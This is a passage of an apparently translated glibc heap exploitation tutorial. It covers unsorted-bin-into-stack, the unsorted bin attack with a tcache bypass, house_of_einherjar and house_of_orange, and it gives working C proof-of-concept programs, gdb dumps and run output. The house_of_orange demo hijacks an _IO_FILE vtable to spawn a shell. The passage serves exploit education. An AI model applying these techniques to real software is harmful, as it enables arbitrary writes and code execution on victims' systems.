Malloc a chunk which size is 0x110 will return the region of our fake chunk: 0x7fffcd906490
malloc(0x100): 0x7fffcd906490

unsorted-bin-into-stack overwrites the bk pointer of a chunk in the unsorted bin with an arbitrary address, so that malloc returns a chunk located on the stack.

First put a chunk into the unsorted bin and forge a fake chunk on the stack:

gdb-peda$ x/6gx victim - 2
0x602000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x602010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x602020:    0x0000000000000000    0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0:    0x0000000000000000    0x0000000000000110  <-- fake chunk
0x7fffffffdbd0:    0x0000000000000000    0x00007fffffffdbc0

Then assume a vulnerability lets us overwrite the bk pointer of the victim chunk, and point it at the fake chunk:

gdb-peda$ x/6gx victim - 2
0x602000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x602010:    0x00007ffff7dd1b78    0x00007fffffffdbc0    <-- bk pointer
0x602020:    0x0000000000000000    0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0:    0x0000000000000000    0x0000000000000110  <-- fake chunk
0x7fffffffdbd0:    0x0000000000000000    0x00007fffffffdbc0

At this point the fake chunk is effectively linked into the unsorted bin. On the next malloc, the allocator walks the list along the bk pointers and finds the fake chunk, whose size is an exact fit:

gdb-peda$ x/6gx victim - 2
0x602000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x602010:    0x00007ffff7dd1bf8    0x00007ffff7dd1bf8
0x602020:    0x0000000000000000    0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdbc0:    0x0000000000000000    0x0000000000000110  <-- fake chunk
0x7fffffffdbd0:    0x00007ffff7dd1b78    0x00007fffffffdbc0

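The fake chunk is returned, while the victim chunk is removed from the unsorted bin and placed in a small bin. Note also that the fd pointer of the fake chunk has been modified: it now holds the address of the unsorted bin, which can be used to leak the libc address. This is exactly what the unsorted bin attack below covers.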
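Why does malloc(0x100) accept a fake chunk whose size field is 0x110, while the 0x90 victim is skipped? The sketch below reproduces the request-to-chunk-size rounding under assumed x86-64 constants (SIZE_SZ = 8, 16-byte alignment, MINSIZE = 0x20). It is modeled on glibc's request2size macro, and exact_fit is a hypothetical helper added for illustration.

```c
#include <stdint.h>

/* Assumed x86-64 values. */
#define SIZE_SZ            UINT64_C(8)
#define MALLOC_ALIGN_MASK  UINT64_C(15)
#define MINSIZE            UINT64_C(0x20)

/* Pad a user request to the size of the chunk that will hold it. */
uint64_t request2size(uint64_t req)
{
    uint64_t nb = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
    return nb < MINSIZE ? MINSIZE : nb;
}

/* 1 if a chunk with this size field exactly satisfies the request. */
int exact_fit(uint64_t size_field, uint64_t req)
{
    uint64_t size = size_field & ~UINT64_C(7);   /* drop the flag bits */
    return size == request2size(req);
}
```

Here request2size(0x100) is 0x110, so the fake chunk (size 0x110) is an exact fit, whereas the victim (size field 0x91) is not and gets sorted into its small bin instead.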

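Uncommenting the tcache block in the example program gives the version for libc-2.27. Note, however, that because of tcache, stack_buf[3] can no longer be set to an arbitrary address.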

Before malloc:

gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000      0x0000000000000091  <-- victim chunk
0x555555756260: 0x00007ffff7dd2b00      0x00007fffffffdcb0
0x555555756270: 0x0000000000000000      0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdcb0: 0x0000000000000000      0x0000000000000110  <-- fake chunk
0x7fffffffdcc0: 0x0000000000000000      0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000555555756670  <-- entries
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x0000000000000000
0x5555557560d0: 0x0000000000000000      0x0000000000000000

After malloc:

gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000      0x0000000000000091  <-- victim chunk
0x555555756260: 0x00007ffff7dd2b80      0x00007ffff7dd2b80
0x555555756270: 0x0000000000000000      0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdcb0: 0x0000000000000000      0x0000000000000110  <-- fake chunk
0x7fffffffdcc0: 0x00007ffff7dd2b00      0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000      0x0700000000000000  <-- counts  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000555555756670  <-- entries
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x00007fffffffdcc0  <-- entries
0x5555557560d0: 0x0000000000000000      0x0000000000000000

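We can see that during malloc the fake chunk is linked into the tcache bin over and over until the bin is full, and only then is it taken from the unsorted bin. As before, the fd of the fake chunk points to the unsorted bin.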

unsorted_bin_attack

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_var = 0;
    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);

    unsigned long *p  = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);

    free(p);
    fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);

    p[1] = (unsigned long)(&stack_var - 2);
    fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);

    malloc(0x80);
    fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffc9b1d61b0 -> 0

Now, we allocate first small chunk on the heap at: 0x1066010
We free the first chunk now. Its bk pointer point to 0x7f2404cf5b78
We write it with the target address-0x10: 0x7ffc9b1d61a0

Let's malloc again to get the chunk we just free: 0x7ffc9b1d61b0 -> 0x7f2404cf5b78

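An unsorted bin attack is usually a preparation step for a further attack. The unsorted bin is a doubly linked list, and a chunk is removed from the list by an unlink operation when it is allocated. So if we control the bk pointer of a chunk in the unsorted bin, we can write a pointer to an arbitrary location. Here the unlink writes a libc address into memory we control, which leaks information and makes further attacks easier.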

The unlink operation on the unsorted bin looks like this:

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

where bck = victim->bk.
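The effect of these two assignments can be reproduced on ordinary structs. The following is a simplified model, not glibc code: struct chunk keeps only the four leading fields, and the fd field of a local fake chunk stands in for the target word (on x86-64 that field sits 0x10 bytes into the chunk, which is why the attack uses target address - 0x10).

```c
#include <stddef.h>

/* Simplified chunk layout; only the fields the removal touches matter. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* The two writes performed when `victim` is taken off the unsorted list. */
static void unsorted_remove(struct chunk *bin, struct chunk *victim)
{
    struct chunk *bck = victim->bk;
    bin->bk = bck;
    bck->fd = bin;      /* the attacker-directed write */
}

/* Returns 1 if the removal wrote the bin address into the target word. */
int demo_unsorted_write(void)
{
    struct chunk bin = {0}, victim = {0}, fake = {0};

    /* A bin holding a single free chunk. */
    bin.fd = bin.bk = &victim;
    victim.fd = victim.bk = &bin;

    /* The corrupted bk pointer: fake.fd plays the role of the target. */
    victim.bk = &fake;
    unsorted_remove(&bin, &victim);

    return fake.fd == &bin && bin.bk == &fake;
}
```

The value written is always the address of the bin head, so the attacker chooses where the write lands but not what is written.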

First allocate two chunks, then free the first one, which is added to the unsorted bin:

gef➤  x/26gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1 [be freed]
0x602010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x602020:    0x0000000000000000    0x0000000000000000
0x602030:    0x0000000000000000    0x0000000000000000
0x602040:    0x0000000000000000    0x0000000000000000
0x602050:    0x0000000000000000    0x0000000000000000
0x602060:    0x0000000000000000    0x0000000000000000
0x602070:    0x0000000000000000    0x0000000000000000
0x602080:    0x0000000000000000    0x0000000000000000
0x602090:    0x0000000000000090    0x0000000000000020  <-- chunk 2
0x6020a0:    0x0000000000000000    0x0000000000000000
0x6020b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6020c0:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx &stack_var-2
0x7fffffffdc50:    0x00007fffffffdd60    0x0000000000400712
0x7fffffffdc60:    0x0000000000000000    0x0000000000602010
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x90, flags=PREV_INUSE)

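Then assume an overflow lets us modify the data of chunk 1. We change the bk pointer of chunk 1 to the target address - 0x10 (&stack_var - 2 in the code), which is equivalent to having a fake free chunk whose fd field sits at the target address, and then call malloc: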

gef➤  x/26gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 3
0x602010:    0x00007ffff7dd1b78    0x00007fffffffdc50
0x602020:    0x0000000000000000    0x0000000000000000
0x602030:    0x0000000000000000    0x0000000000000000
0x602040:    0x0000000000000000    0x0000000000000000
0x602050:    0x0000000000000000    0x0000000000000000
0x602060:    0x0000000000000000    0x0000000000000000
0x602070:    0x0000000000000000    0x0000000000000000
0x602080:    0x0000000000000000    0x0000000000000000
0x602090:    0x0000000000000090    0x0000000000000021  <-- chunk 2
0x6020a0:    0x0000000000000000    0x0000000000000000
0x6020b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6020c0:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx &stack_var-2
0x7fffffffdc50:    0x00007fffffffdc80    0x0000000000400756  <-- fake chunk
0x7fffffffdc60:    0x00007ffff7dd1b78    0x0000000000602010      <-- fd->TAIL

This leaks the address of the unsorted bin head.

Now let's see how this works under libc-2.27:

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_var = 0;
    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);

    unsigned long *p = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);

    free(p);
    fprintf(stderr, "Freed the first chunk to put it in a tcache bin\n");

    p[0] = (unsigned long)(&stack_var);
    fprintf(stderr, "Overwrite the next ptr with the target address\n");
    malloc(0x80);
    malloc(0x80);
    fprintf(stderr, "Now we malloc twice to make tcache struct's counts '0xff'\n\n");

    free(p);
    fprintf(stderr, "Now free again to put it in unsorted bin\n");
    p[1] = (unsigned long)(&stack_var - 2);
    fprintf(stderr, "Now write its bk ptr with the target address-0x10: %p\n\n", (void*)p[1]);

    malloc(0x80);
    fprintf(stderr, "Finally malloc again to get the chunk at target address: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g tcache_unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffef0884c10 -> 0

Now, we allocate first small chunk on the heap at: 0x564866907260
Freed the first chunk to put it in a tcache bin
Overwrite the next ptr with the target address
Now we malloc twice to make tcache struct's counts '0xff'

Now free again to put it in unsorted bin
Now write its bk ptr with the target address-0x10: 0x7ffef0884c00

Finally malloc again to get the chunk at target address: 0x7ffef0884c10 -> 0x7f69ba1d8ca0

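Because of tcache, when malloc takes a chunk from the unsorted bin and the corresponding tcache bin is not yet full, it first moves the chunks from the unsorted bin into that tcache bin and then serves the request from the tcache bin. This is where the problem arises: while filling the tcache bin, malloc treats our target address as a chunk too, but this "chunk" fails the size check and malloc aborts with a "memory corruption" error: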

      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
              || __builtin_expect (chunksize_nomask (victim)
                   > av->system_mem, 0))
            malloc_printerr ("malloc(): memory corruption");

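To skip the step that stashes chunks, the counts field of the corresponding tcache bin must be no less than tcache_count (7 by default). But a nonzero counts means the tcache bin holds chunks, so malloc takes one directly from the tcache bin and the unsorted bin is never touched: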

  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }

This is a contradiction, so we need a way to take a chunk from the unsorted bin without having chunks stashed into the tcache bin.

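This leads to the approach in the program above: tcache poisoning (see Section 4.14) is used to change counts to 0xff, so that execution reaches the code below, takes the else branch, and removes the chunk and returns it directly: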

#if USE_TCACHE
          /* Fill cache first, return to user only if cache fills.
         We may return one of these chunks later.  */
          if (tcache_nb
          && tcache->counts[tc_idx] < mp_.tcache_count)
        {
          tcache_put (victim, tc_idx);
          return_cached = 1;
          continue;
        }
          else
        {
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;

This successfully leaks the address of the unsorted bin head.
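The 0xff value comes from an underflow of the per-bin counter. The sketch below assumes the glibc 2.27 layout, in which counts is an array of char and each tcache_get decrements the entry by one; the helper names are hypothetical. In the demo, free puts one chunk in the bin (counts = 1) and the two malloc calls take two entries out, the second being the poisoned pointer.

```c
#include <stddef.h>

/* Default value of mp_.tcache_count in glibc 2.27. */
#define TCACHE_COUNT 7

/* Mirrors `tcache->counts[tc_idx] < mp_.tcache_count` (char vs size_t). */
int would_stash(char count)
{
    return (size_t) count < (size_t) TCACHE_COUNT;
}

/* Counter value after n tcache_get calls, each decrementing by one. */
char count_after_gets(char count, int n_gets)
{
    while (n_gets-- > 0)
        --count;
    return count;
}
```

count_after_gets(1, 2) leaves the byte 0xff in counts. Converted to size_t for the comparison it is far larger than 7, so would_stash returns 0 and malloc takes the else branch, even though the bin's entries pointer is NULL.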

house_of_einherjar

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main() {
    uint8_t *a, *b, *d;

    a = (uint8_t*) malloc(0x10);
    int real_a_size = malloc_usable_size(a);
    memset(a, 'A', real_a_size);
    fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n\n", a);

    size_t fake_chunk[6];
    fake_chunk[0] = 0x80;
    fake_chunk[1] = 0x80;
    fake_chunk[2] = (size_t) fake_chunk;
    fake_chunk[3] = (size_t) fake_chunk;
    fake_chunk[4] = (size_t) fake_chunk;
    fake_chunk[5] = (size_t) fake_chunk;
    fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
    fprintf(stderr, "prev_size: %#lx\n", fake_chunk[0]);
    fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
    fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
    fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
    fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
    fprintf(stderr, "bck_nextsize: %#lx\n\n", fake_chunk[5]);

    b = (uint8_t*) malloc(0xf8);
    int real_b_size = malloc_usable_size(b);
    uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
    fprintf(stderr, "We allocate 0xf8 bytes for 'b': %p\n", b);
    fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
    a[real_a_size] = 0;
    fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);

    size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
    *(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
    fprintf(stderr, "We write a fake prev_size to the last %lu bytes of a so that it will consolidate with our fake chunk\n", sizeof(size_t));
    fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n\n", b-sizeof(size_t)*2, fake_chunk, fake_size);

    fake_chunk[1] = fake_size;
    fprintf(stderr, "Modify fake chunk's size to reflect b's new prev_size\n");

    fprintf(stderr, "Now we free b and this will consolidate with our fake chunk\n");
    free(b);
    fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

    d = malloc(0x10);
    memset(d, 'A', 0x10);
    fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk: %p\n", d);
}
$ gcc -g house_of_einherjar.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xb31010

Our fake chunk at 0x7ffdb337b7f0 looks like:
prev_size: 0x80
size: 0x80
fwd: 0x7ffdb337b7f0
bck: 0x7ffdb337b7f0
fwd_nextsize: 0x7ffdb337b7f0
bck_nextsize: 0x7ffdb337b7f0

We allocate 0xf8 bytes for 'b': 0xb31030
b.size: 0x101
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100

We write a fake prev_size to the last 8 bytes of a so that it will consolidate with our fake chunk
Our fake prev_size will be 0xb31020 - 0x7ffdb337b7f0 = 0xffff80024d7b5830

Modify fake chunk's size to reflect b's new prev_size
Now we free b and this will consolidate with our fake chunk
Our fake chunk size is now 0xffff80024d7d6811 (b.size + fake_prev_size)

Now we can call malloc() and it will begin in our fake chunk: 0x7ffdb337b800

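house-of-einherjar is a technique that makes malloc return a nearly arbitrary pointer. It requires an off-by-one overflow that overwrites the size field of the next chunk and clears its PREV_INUSE flag, and it also requires overwriting the prev_size field with the size of a fake chunk. When the next chunk is freed, it sees that the previous chunk is marked as free and tries to consolidate with it. As long as we craft the fake chunk carefully so that the consolidated chunk extends back to the fake chunk, the next malloc returns the address we want. Compared with the poison-null-byte technique discussed earlier, it is more powerful, but it also has more requirements, such as a heap address leak.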

First allocate chunk a, which is assumed to have an off-by-one overflow, then create our fake chunk on the stack. Its size is arbitrary as long as it is a small chunk:

gef➤  x/8gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0x4141414141414141    0x0000000000020fe1  <-- top chunk
0x603030:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx &fake_chunk
0x7fffffffdcb0:    0x0000000000000080    0x0000000000000080  <-- fake chunk
0x7fffffffdcc0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdcd0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdce0:    0x00007fffffffddd0    0xffa7b97358729300

Next create chunk b and use the overflow in chunk a to overwrite its size field, clearing the PREV_INUSE flag. chunk b now believes that the previous chunk is a free chunk:

gef➤  x/8gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0x4141414141414141    0x0000000000000100  <-- chunk b
0x603030:    0x0000000000000000    0x0000000000000000

The size field of chunk b was originally 0x101. We chose malloc(0xf8) for chunk b for convenience: the overwrite only affects the flag bits and leaves the size unchanged.

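Next, set the prev_size field of chunk b according to where the fake chunk sits on the stack. It is computed as the start address of chunk b minus the start address of the fake chunk. To pass the checks, the size field of the fake chunk must also match the prev_size field of chunk b: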

gef➤  x/8gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0xffff800000605370    0x0000000000000100  <-- chunk b <-- prev_size
0x603030:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx &fake_chunk
0x7fffffffdcb0:    0x0000000000000080    0xffff800000605370  <-- fake chunk <-- size
0x7fffffffdcc0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdcd0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdce0:    0x00007fffffffddd0    0xadeb3936608e0600
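Because the fake chunk lives on the stack, above the heap, the subtraction wraps around. A minimal sketch of the arithmetic with 64-bit unsigned values (the function names are hypothetical; the second one models what glibc's chunk_at_offset(p, -prev_size) computes during backward consolidation):

```c
#include <stdint.h>

/* prev_size to plant in chunk b: distance from the fake chunk to b. */
uint64_t fake_prev_size(uint64_t b_chunk, uint64_t fake_chunk)
{
    return b_chunk - fake_chunk;     /* wraps modulo 2^64 */
}

/* Where free() looks for the "previous" chunk when PREV_INUSE is clear. */
uint64_t prev_chunk_addr(uint64_t b_chunk, uint64_t prev_size)
{
    return b_chunk - prev_size;      /* wraps back to the fake chunk */
}
```

With the addresses from the dump above, fake_prev_size(0x603020, 0x7fffffffdcb0) is 0xffff800000605370, and subtracting that value from 0x603020 again lands on 0x7fffffffdcb0. This is why the attacker must know both the heap and the stack address.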

Free chunk b. Because PREV_INUSE is zero, free uses prev_size to locate the previous free chunk, unlinks it, and merges it with the current chunk. The result is visible in the arena:

gef➤  heap arenas
Arena (base=0x7ffff7dd1b20, top=0x7fffffffdcb0, last_remainder=0x0, next=0x7ffff7dd1b20, next_free=0x0, system_mem=0x21000)

The consolidation process was also covered in the poison-null-byte section.

Finally, when we malloc again, the returned address is the address of the fake chunk:

gef➤  x/8gx &fake_chunk
0x7fffffffdcb0:    0x0000000000000080    0x0000000000000021  <-- chunk d
0x7fffffffdcc0:    0x4141414141414141    0x4141414141414141
0x7fffffffdcd0:    0x00007fffffffdcb0    0xffff800000626331
0x7fffffffdce0:    0x00007fffffffddd0    0xbdf40e22ccf46c00

house_of_orange

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int winner (char *ptr);

int main() {
    char *p1, *p2;
    size_t io_list_all, *top;

    p1 = malloc(0x400 - 0x10);

    top = (size_t *) ((char *) p1 + 0x400 - 0x10);
    top[1] = 0xc01;

    p2 = malloc(0x1000);
    io_list_all = top[2] + 0x9a8;
    top[3] = io_list_all - 0x10;

    memcpy((char *) top, "/bin/sh\x00", 8);

    top[1] = 0x61;

    _IO_FILE *fp = (_IO_FILE *) top;
    fp->_mode = 0; // top+0xc0
    fp->_IO_write_base = (char *) 2; // top+0x20
    fp->_IO_write_ptr = (char *) 3; // top+0x28

    size_t *jump_table = &top[12]; // controlled memory
    jump_table[3] = (size_t) &winner;
    *(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8

    malloc(1);
    return 0;
}

int winner(char *ptr) {
    system(ptr);
    return 0;
}
$ gcc -g house_of_orange.c
$ ./a.out
*** Error in `./a.out': malloc(): memory corruption: 0x00007f3daece3520 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f3dae9957e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7f3dae9a013e]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7f3dae9a2184]
./a.out[0x4006cc]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f3dae93e830]
./a.out[0x400509]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:01 919342                             /home/firmy/how2heap/a.out
00600000-00601000 r--p 00000000 08:01 919342                             /home/firmy/how2heap/a.out
00601000-00602000 rw-p 00001000 08:01 919342                             /home/firmy/how2heap/a.out
01e81000-01ec4000 rw-p 00000000 00:00 0                                  [heap]
7f3da8000000-7f3da8021000 rw-p 00000000 00:00 0
7f3da8021000-7f3dac000000 ---p 00000000 00:00 0
7f3dae708000-7f3dae71e000 r-xp 00000000 08:01 398989                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae71e000-7f3dae91d000 ---p 00016000 08:01 398989                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91d000-7f3dae91e000 rw-p 00015000 08:01 398989                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91e000-7f3daeade000 r-xp 00000000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daeade000-7f3daecde000 ---p 001c0000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daecde000-7f3daece2000 r--p 001c0000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece2000-7f3daece4000 rw-p 001c4000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece4000-7f3daece8000 rw-p 00000000 00:00 0
7f3daece8000-7f3daed0e000 r-xp 00000000 08:01 436908                     /lib/x86_64-linux-gnu/ld-2.23.so
7f3daeef4000-7f3daeef7000 rw-p 00000000 00:00 0
7f3daef0c000-7f3daef0d000 rw-p 00000000 00:00 0
7f3daef0d000-7f3daef0e000 r--p 00025000 08:01 436908                     /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0e000-7f3daef0f000 rw-p 00026000 08:01 436908                     /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0f000-7f3daef10000 rw-p 00000000 00:00 0
7ffe8eba6000-7ffe8ebc7000 rw-p 00000000 00:00 0                          [stack]
7ffe8ebee000-7ffe8ebf1000 r--p 00000000 00:00 0                          [vvar]
7ffe8ebf1000-7ffe8ebf3000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
$ whoami
firmy
$ exit
Aborted (core dumped)

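house-of-orange is an exploitation technique that uses a heap overflow to modify the _IO_list_all pointer. It requires leaking heap and libc addresses. Initially the entire heap belongs to the top chunk. Each allocation request carves a block of the requested size out of the top chunk and returns it to the user, so the top chunk keeps shrinking.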

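When the remaining top chunk can no longer satisfy a request, sysmalloc() is called to obtain new memory. Two things can happen: the top chunk is extended directly, or mmap is called to allocate a new region. Which path is taken depends on the request size. To take the first path and extend the top chunk, the request must be smaller than the threshold mp_.mmap_threshold: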

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
      && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {

In addition, for _int_free() to be called inside sysmalloc(), the top chunk must be at least MINSIZE, which is 0x20 on x86-64 (0x10 on 32-bit):

                      if (old_size >= MINSIZE)
                        {
                          _int_free (av, old_top, 1);
                        }

Of course, the following two constraints must also be satisfied:

  /*
     If not the first time through, we require old_size to be
     at least MINSIZE and to have prev_inuse set.
   */

  assert ((old_top == initial_top (av) && old_size == 0) ||
          ((unsigned long) (old_size) >= MINSIZE &&
           prev_inuse (old_top) &&
           ((unsigned long) old_end & (pagesize - 1)) == 0));

  /* Precondition: not enough current space to satisfy nb request */
  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));

That is, old_size must be smaller than nb+MINSIZE, the PREV_INUSE flag must be 1, and old_top+old_size must be page-aligned.
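These constraints can be collected into one predicate for trying out candidate size values. This is a sketch under assumed x86-64 constants (MINSIZE = 0x20, 4 KiB pages); top_size_ok is a hypothetical helper that restates the two asserts, not a glibc function.

```c
#include <stdint.h>

/* Assumed x86-64 values. */
#define MINSIZE     UINT64_C(0x20)
#define PAGE_BYTES  UINT64_C(0x1000)
#define PREV_INUSE  UINT64_C(0x1)

/*
 * 1 if a forged top chunk size field passes the sysmalloc asserts
 * for a request whose padded chunk size is nb.
 */
int top_size_ok(uint64_t old_top, uint64_t size_field, uint64_t nb)
{
    uint64_t old_size = size_field & ~UINT64_C(7);   /* strip flag bits */
    uint64_t old_end  = old_top + old_size;

    return old_size >= MINSIZE
        && (size_field & PREV_INUSE) != 0
        && (old_end & (PAGE_BYTES - 1)) == 0
        && old_size < nb + MINSIZE;
}
```

For a top chunk at 0x602400 and a later malloc(0x1000) (nb = 0x1010), the value 0xc01 passes: 0x602400 + 0xc00 = 0x603000 is page-aligned. 0xc00 fails because PREV_INUSE is clear, and 0xc11 fails the alignment check.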

First allocate a chunk of size 0x400:

gef➤  x/4gx p1-0x10
0x602000:    0x0000000000000000    0x0000000000000401  <-- chunk p1
0x602010:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000020c01  <-- top chunk
0x602410:    0x0000000000000000    0x0000000000000000

By default the top chunk size is 0x21000. Subtracting 0x400 leaves 0x20c00, and PREV_INUSE is set.

Now assume an overflow lets us modify the top chunk. We change its size field to 0xc01, which satisfies the conditions above:

gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000000c01  <-- top chunk
0x602410:    0x0000000000000000    0x0000000000000000

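Next, request a large block. Because the modified top chunk size cannot satisfy the request, sysmalloc takes the first path and extends the heap. As a result, a new top chunk (new_top) is created after old_top, and old_top is freed, that is, added to the unsorted bin: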

gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000000be1  <-- old top chunk [be freed]
0x602410:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
gef➤  x/4gx p1-0x10+0x400+0xbe0
0x602fe0:    0x0000000000000be0    0x0000000000000010  <-- fencepost chunk 1
0x602ff0:    0x0000000000000000    0x0000000000000011  <-- fencepost chunk 2
gef➤  x/4gx p2-0x10
0x623000:    0x0000000000000000    0x0000000000001011  <-- chunk p2
0x623010:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx p2-0x10+0x1010
0x624010:    0x0000000000000000    0x0000000000020ff1  <-- new top chunk
0x624020:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
